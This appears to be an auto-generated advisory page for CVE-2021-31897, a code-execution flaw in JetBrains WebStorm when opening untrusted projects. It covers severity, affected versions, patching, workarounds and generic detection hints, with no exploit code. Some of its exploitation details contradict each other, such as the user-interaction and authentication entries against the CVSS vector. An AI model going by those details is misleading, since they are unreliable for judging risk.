CVE-2021-31897 – This vulnerability in JetBrains WebStorm allows... (How to Fix)

Q: What is the severity of CVE-2021-31897?

CVE-2021-31897 has a CVSS score of 9.8 (CRITICAL). This vulnerability in JetBrains WebStorm allows arbitrary code execution without user confirmation when opening untrusted projects. It affects WebStorm users who open projects from untrusted sources, potentially leading to full system compromise.

📋 TL;DR

This vulnerability in JetBrains WebStorm allows arbitrary code execution without user confirmation when opening untrusted projects. It affects WebStorm users who open projects from untrusted sources, potentially leading to full system compromise.

💻 Affected Systems

Products:

JetBrains WebStorm

Versions: All versions before 2021.1

Operating Systems: Windows, macOS, Linux

Default Config Vulnerable: ⚠️ Yes

Notes: Vulnerability triggers when opening untrusted projects; default configuration is vulnerable.

📦 What is this software?

Webstorm by Jetbrains

View all CVEs affecting Webstorm →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system takeover with attacker gaining full control of the development environment and potentially the underlying system.

🟠

Likely Case

Malicious code execution within the WebStorm environment, potentially leading to credential theft, data exfiltration, or lateral movement.

🟢

If Mitigated

No impact if proper version control and project source verification are implemented.

🌐 Internet-Facing: LOW - WebStorm is typically not directly internet-facing.

🏢 Internal Only: HIGH - Developers opening untrusted projects from internal sources or external repositories are at significant risk.

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires user interaction (opening untrusted project) but no authentication needed beyond that.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: WebStorm 2021.1 and later

Vendor Advisory: https://blog.jetbrains.com/blog/2021/05/07/jetbrains-security-bulletin-q1-2021/

Restart Required: Yes

Instructions:

1. Open WebStorm. 2. Go to Help > Check for Updates. 3. Install WebStorm 2021.1 or later. 4. Restart WebStorm.

🔧 Temporary Workarounds

Avoid Untrusted Projects

all

Only open projects from trusted sources; verify project integrity before opening.

Sandbox Environment

all

Run WebStorm in a sandboxed or isolated environment when working with potentially untrusted projects.

🧯 If You Can't Patch

Implement strict policy prohibiting opening projects from untrusted sources
Use virtual machines or containers for testing untrusted projects

🔍 How to Verify

Check if Vulnerable:

Check WebStorm version in Help > About. If version is earlier than 2021.1, system is vulnerable.

Check Version:

On Windows: "C:\Program Files\JetBrains\WebStorm <version>\bin\webstorm64.exe" --version. On macOS/Linux: Check About dialog in application.

Verify Fix Applied:

Verify version is 2021.1 or later in Help > About.

📡 Detection & Monitoring

Log Indicators:

Unusual process execution from WebStorm
Suspicious project loading events

Network Indicators:

Unexpected outbound connections from WebStorm process

SIEM Query:

Process creation where parent process contains 'webstorm' and command line contains suspicious patterns

📊 Metadata

CVE ID: CVE-2021-31897

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Published: May 11, 2021

Last Updated: November 21, 2024

🔗 References

https://blog.jetbrains.com Vendor Advisory
https://blog.jetbrains.com/blog/2021/05/07/jetbrains-security-bulletin-q1-2021/ Vendor Advisory
https://blog.jetbrains.com Vendor Advisory
https://blog.jetbrains.com/blog/2021/05/07/jetbrains-security-bulletin-q1-2021/ Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON